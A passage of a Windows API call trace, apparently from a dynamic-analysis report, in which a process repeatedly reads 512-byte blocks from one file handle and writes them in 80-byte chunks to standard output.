hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.085] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 
[0193.085] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] GetFileType (hFile=0x50) returned 0x1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] GetFileType (hFile=0x50) returned 0x1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] GetFileType (hFile=0x50) returned 0x1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] GetFileType (hFile=0x50) returned 0x1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] WriteFile (in: hFile=0x50, 
lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.086] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.086] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] GetFileType (hFile=0x50) returned 0x1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] GetFileType (hFile=0x50) returned 0x1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.086] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.087] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0193.087] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.087] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.087] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.087] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.087] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, 
lpOverlapped=0x0) returned 1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] GetFileType (hFile=0x50) returned 0x1 [0193.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.087] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.088] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.088] GetFileType (hFile=0x50) returned 0x1 [0193.088] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.088] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.089] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.089] GetFileType (hFile=0x50) returned 0x1 [0193.089] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.089] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.089] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] GetFileType (hFile=0x50) returned 0x1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] GetFileType (hFile=0x50) returned 0x1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 
| out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] GetFileType (hFile=0x50) returned 0x1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] GetFileType (hFile=0x50) returned 0x1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.090] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.090] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.090] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.090] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] GetFileType (hFile=0x50) returned 0x1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] GetFileType (hFile=0x50) returned 0x1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.090] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.090] GetFileType (hFile=0x50) returned 0x1 [0193.090] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0193.090] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 
[0193.091] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.091] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.091] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] GetFileType (hFile=0x50) returned 0x1 [0193.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.091] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] GetFileType (hFile=0x50) returned 0x1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 
[0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] GetFileType (hFile=0x50) returned 0x1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] GetFileType (hFile=0x50) returned 0x1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] GetFileType (hFile=0x50) returned 0x1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] GetFileType (hFile=0x50) returned 0x1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.092] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.092] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, 
lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] GetFileType (hFile=0x50) returned 0x1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] GetFileType (hFile=0x50) returned 0x1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.092] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.093] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.093] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] GetFileType (hFile=0x50) returned 0x1 [0193.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.093] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType 
(hFile=0x50) returned 0x1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType (hFile=0x50) returned 0x1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType (hFile=0x50) returned 0x1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType (hFile=0x50) returned 0x1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType (hFile=0x50) returned 0x1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType (hFile=0x50) returned 0x1 [0193.094] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.094] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.094] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType (hFile=0x50) returned 0x1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] GetFileType (hFile=0x50) returned 0x1 [0193.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.094] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] WriteFile (in: 